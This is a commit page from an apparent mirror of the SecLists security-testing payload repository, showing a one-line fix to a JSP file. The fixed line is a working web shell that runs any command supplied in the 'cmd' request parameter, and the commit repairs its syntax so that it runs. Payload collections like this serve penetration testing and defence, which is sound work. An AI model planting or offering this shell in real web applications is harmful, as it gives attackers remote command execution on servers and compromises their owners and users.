mirror of
https://github.com/danielmiessler/SecLists
synced 2025-12-06 00:43:40 +01:00
Fix syntax errors
This commit is contained in:
parent
93e2c5b064
commit
8dfac3774b
1 changed files with 1 additions and 1 deletions
|
|
@ -1,3 +1,3 @@
|
|||
<%
|
||||
Runtime.getruntime().exec(request.getParameter("cmd"))
|
||||
Runtime.getRuntime().exec(request.getParameter("cmd"));
|
||||
%>
|
||||
|
|
|
|||
Loading…
Reference in a new issue